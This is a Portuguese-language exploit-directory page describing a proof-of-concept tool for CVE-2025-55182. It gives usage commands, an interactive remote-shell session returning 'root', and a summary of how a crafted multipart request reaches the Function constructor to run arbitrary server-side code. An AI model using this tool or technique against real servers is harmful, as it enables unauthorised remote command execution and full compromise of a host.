Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182-PoC — Poc para CVE-2025-55182 | Kitploit
Ferramentas/GitHubGitHub/emiyelbarto/cve-2025-55182-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubemiyelbarto/cve-2025-55182-poc

CVE-2025-55182-PoC

Poc para CVE-2025-55182

Ver Repositório
1há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182-PoC

PoC para CVE-2025-55182

root@kitploit:~
Usage: python3 poc.py -u http://target.com --cmd "<cmd_here>"

Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e testes de segurança autorizados. O uso desta ferramenta para atacar alvos sem consentimento prévio mútuo é ilegal. O desenvolvedor não assume nenhuma responsabilidade e não se responsabiliza por qualquer uso indevido ou danos causados por este programa.

Requisitos

pip install requests

Uso

Você pode executar a ferramenta em três modos: Check (Verificação), Exploit (Exploração) ou Shell Interativo.

root@kitploit:~
usage: poc.py [-h] [-u URL] [--id ID] [-c CMD] [--check]

options:
  -h, --help         show this help message and exit
  -u URL             Target URL (e.g., http://localhost:3000)
  --id ID            Target Server Action ID (default: user-profile-action)
  -c CMD, --cmd CMD  Command to execute directly (non-interactive mode)
  --check            Only check for vulnerability (Crash Method), do not exploit

Exemplo

Baixar ferramenta
root@kitploit:~
python3 poc.py -u http://target-site.com --check

Execução de comando único

root@kitploit:~
python3 poc.py -u http://target-site.com --cmd "id"

Modo de Shell Interativo

root@kitploit:~
python3 poc.py

# Inside the shell
RSC-Shell> set url http://localhost:3000
[+] URL set to: http://localhost:3000
RSC-Shell> check
[+] TARGET IS VULNERABLE!
RSC-Shell> shell
[*] Starting pseudo-interactive shell. Use 'exit' to return.
cmd> whoami
root

Como funciona

A Verificação: Envia uma requisição multipart definindo {} no índice 1, e tenta acessar ["$1:a:a"]. Servidores não corrigidos travam (HTTP 500) ao tentar acessar a propriedade a de undefined. Servidores corrigidos retornam HTTP 200.

A Exploração: Envia uma requisição multipart referenciando o Action ID válido, mas acrescenta #constructor. Isso engana o serializador, fazendo-o retornar o construtor Function, permitindo que passemos JavaScript arbitrário (Node.js child_process) para ser executado no servidor.